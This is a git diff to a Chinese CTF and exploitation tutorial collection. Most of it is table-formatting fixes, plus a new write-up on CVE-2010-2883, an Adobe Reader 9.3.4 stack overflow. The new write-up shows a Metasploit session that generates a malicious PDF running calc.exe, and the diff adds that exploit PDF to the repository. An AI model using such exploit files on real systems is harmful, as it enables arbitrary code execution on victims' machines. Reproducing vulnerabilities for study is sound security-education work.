diff --git a/SUMMARY.md b/SUMMARY.md index 35b54f0..7bdf5bf 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -174,6 +174,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One * [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](doc/7.1.5_glibc_2018-1000001.md) * [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](doc/7.1.6_dnstracer_2017-9430.md) * [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](doc/7.1.7_binutils_2018-6323.md) + * [7.1.8 [CVE-2010-2883] Adobe Reader 9.3.4 Stack Buffer Overflow](doc/7.1.8_adobe_reader_2010-2883.md) * Malware * [八、学术篇](doc/8_academic.md) * [8.1 The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)](doc/8.1_ret2libc_without_func_calls.md) diff --git a/doc/7.1.1_tcpdump_2017-11543.md b/doc/7.1.1_tcpdump_2017-11543.md index 79503bc..9585493 100644 --- a/doc/7.1.1_tcpdump_2017-11543.md +++ b/doc/7.1.1_tcpdump_2017-11543.md @@ -18,7 +18,7 @@ tcpdump 是 Linux 上一个强大的网络数据采集分析工具,其 4.9.0 | |推荐使用的环境 | 备注 | | --- | --- | --- | | 操作系统 | Ubuntu 16.04 | 体系结构:32 位| -| 调试器 | gdb-peda| 版本号:7.11.1 | +| 调试器 | gdb-peda | 版本号:7.11.1 | | 漏洞软件 | tcpdump | 版本号:4.9.0 | 为了编译 tcpdump,我们需要安装 dev 版本的 libpcap: diff --git a/doc/7.1.2_glibc_2015-0235.md b/doc/7.1.2_glibc_2015-0235.md index 076c32b..9a2683d 100644 --- a/doc/7.1.2_glibc_2015-0235.md +++ b/doc/7.1.2_glibc_2015-0235.md @@ -17,7 +17,7 @@ glibc 是 GNU 的 C 运行库,几乎所有 Linux 的其他运行库都依赖 | |推荐使用的环境 | 备注 | | --- | --- | --- | | 操作系统 | Ubuntu 12.04 | 体系结构:64 位 | -| 调试器 | gdb-peda| 版本号:7.4 | +| 调试器 | gdb-peda | 版本号:7.4 | | 漏洞软件 | glibc | 版本号:2.15 | | 受影响软件 | Exim4 | 版本号:4.80 | diff --git a/doc/7.1.4_wget_2017-13089.md b/doc/7.1.4_wget_2017-13089.md index 95aad29..c76c9eb 100644 --- a/doc/7.1.4_wget_2017-13089.md +++ b/doc/7.1.4_wget_2017-13089.md @@ -19,7 +19,7 @@ wget 是一个从网络上自动下载文件的工具,支持通过 HTTP、HTTP | |推荐使用的环境 | 备注 | | --- | --- | --- | | 操作系统 | Ubuntu 16.04 | 体系结构:64 位 | -| 调试器 | gdb-peda| 版本号:7.11.1 | +| 调试器 | gdb-peda | 版本号:7.11.1 | | 漏洞软件 | wget | 版本号:1.19.1 | 首先编译安装 wget-1.19.1: diff --git a/doc/7.1.5_glibc_2018-1000001.md b/doc/7.1.5_glibc_2018-1000001.md index 4bf6c5f..f2341a4 100644 --- a/doc/7.1.5_glibc_2018-1000001.md +++ b/doc/7.1.5_glibc_2018-1000001.md @@ -17,7 +17,7 @@ | |推荐使用的环境 | 备注 | | --- | --- | --- | | 操作系统 | Ubuntu 16.04 | 体系结构:64 位 | -| 调试器 | gdb-peda| 版本号:7.11.1 | +| 调试器 | gdb-peda | 版本号:7.11.1 | | 漏洞软件 | glibc | 版本号:2.23-0ubuntu9 | ```c diff --git a/doc/7.1.6_dnstracer_2017-9430.md b/doc/7.1.6_dnstracer_2017-9430.md index 2aa6570..a285e97 100644 --- a/doc/7.1.6_dnstracer_2017-9430.md +++ b/doc/7.1.6_dnstracer_2017-9430.md @@ -17,7 +17,7 @@ DNSTracer 是一个用来跟踪 DNS 解析过程的应用程序。DNSTracer 1.9 | |推荐使用的环境 | 备注 | | --- | --- | --- | | 操作系统 | Ubuntu 12.04 | 体系结构:32 位 | -| 调试器 | gdb-peda| 版本号:7.4 | +| 调试器 | gdb-peda | 版本号:7.4 | | 漏洞软件 | DNSTracer | 版本号:1.9 | 首先编译安装 DNSTracer: diff --git a/doc/7.1.7_binutils_2018-6323.md b/doc/7.1.7_binutils_2018-6323.md index b4fccfa..9ae149e 100644 --- a/doc/7.1.7_binutils_2018-6323.md +++ b/doc/7.1.7_binutils_2018-6323.md @@ -16,7 +16,7 @@ | |推荐使用的环境 | 备注 | | --- | --- | --- | | 操作系统 | Ubuntu 16.04 | 体系结构:32 位 | -| 调试器 | gdb-peda| 版本号:7.11.1 | +| 调试器 | gdb-peda | 版本号:7.11.1 | | 漏洞软件 | binutils | 版本号:2.29.1 | 系统自带的版本是 2.26.1,我们这里编译安装有漏洞的最后一个版本 2.29.1: diff --git a/doc/7.1.8_adobe_reader_2010-2883.md b/doc/7.1.8_adobe_reader_2010-2883.md new file mode 100644 index 0000000..a9bfc28 --- /dev/null +++ b/doc/7.1.8_adobe_reader_2010-2883.md @@ -0,0 +1,52 @@ +# 7.1.8 [CVE-2010-2883] Adobe Reader 9.3.4 Stack Buffer Overflow + +- [漏洞描述](#漏洞描述) +- [漏洞复现](#漏洞复现) +- [漏洞分析](#漏洞分析) +- [参考资料](#参考资料) + + +[下载文件](../src/exploit/7.1.8_adobe_reader_2010-2883) + +## 漏洞描述 +Adobe Reader 和 Acrobat 9.4 之前版本的 CoolType.dll 中存在基于栈的缓冲区溢出漏洞。远程攻击者可借助带有 TTF 字体的 Smart INdependent Glyphlets (SING) 表格中超长字段的 PDF 文件执行任意代码或者导致拒绝服务。 + + +## 漏洞复现 +| |推荐使用的环境 | 备注 | +| --- | --- | --- | +| 操作系统 | Windows XP SP3 | 体系结构:32 位 | +| 调试器 | WinDbg | 版本号:10.0 x86 | +| 漏洞软件 | Adobe Reader | 版本号:9.3.4 | + +我们利用 Metasploit 来生成攻击样本: +``` +msf > search cve-2010-2883 + Name Disclosure Date Rank Description + ---- --------------- ---- ----------- + exploit/windows/fileformat/adobe_cooltype_sing 2010-09-07 great Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow + +msf > use exploit/windows/fileformat/adobe_cooltype_sing + +msf exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/exec +payload => windows/exec + +msf exploit(windows/fileformat/adobe_cooltype_sing) > set cmd calc.exe +cmd => calc.exe + +msf exploit(windows/fileformat/adobe_cooltype_sing) > set filename cve20102883.pdf +filename => cve20102883.pdf + +msf exploit(windows/fileformat/adobe_cooltype_sing) > exploit +[*] Creating 'cve20102883.pdf' file... +[+] cve20102883.pdf stored at /home/firmy/.msf4/local/cve20102883.pdf +``` + +使用漏洞版本的 Adobe Reader 打开样本,即可弹出计算器: + + +## 漏洞分析 + +## 参考资料 +- 《漏洞战争》 +- https://www.cvedetails.com/cve/CVE-2010-2883/ diff --git a/doc/7_exploit.md b/doc/7_exploit.md index 4f8706a..cd20588 100644 --- a/doc/7_exploit.md +++ b/doc/7_exploit.md @@ -8,4 +8,5 @@ * [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md) * [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md) * [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](7.1.7_binutils_2018-6323.md) + * [7.1.8 [CVE-2010-2883] Adobe Reader 9.3.4 Stack Buffer Overflow](7.1.8_adobe_reader_2010-2883.md) * Malware diff --git a/doc/9.2_wintools.md b/doc/9.2_wintools.md index fee2b9d..cfbab3f 100644 --- a/doc/9.2_wintools.md +++ b/doc/9.2_wintools.md @@ -8,6 +8,7 @@ - [PortEx Analyzer](#portex-analyzer) - [Resource Hacker](#resource-hacker) - [wxHexEditor](#wxhexeditor) +- [PDF Stream Dumper](#pdf-stream-dumper) ## 010 Editor @@ -35,3 +36,6 @@ http://www.angusj.com/resourcehacker/ ## wxHexEditor http://www.wxhexeditor.org/ + +## PDF Stream Dumper +http://sandsprite.com/blogs/index.php?uid=7&pid=57 diff --git a/src/exploit/7.1.8_adobe_reader_2010-2883/cve20102883.pdf b/src/exploit/7.1.8_adobe_reader_2010-2883/cve20102883.pdf new file mode 100644 index 0000000..3c6f95d Binary files /dev/null and b/src/exploit/7.1.8_adobe_reader_2010-2883/cve20102883.pdf differ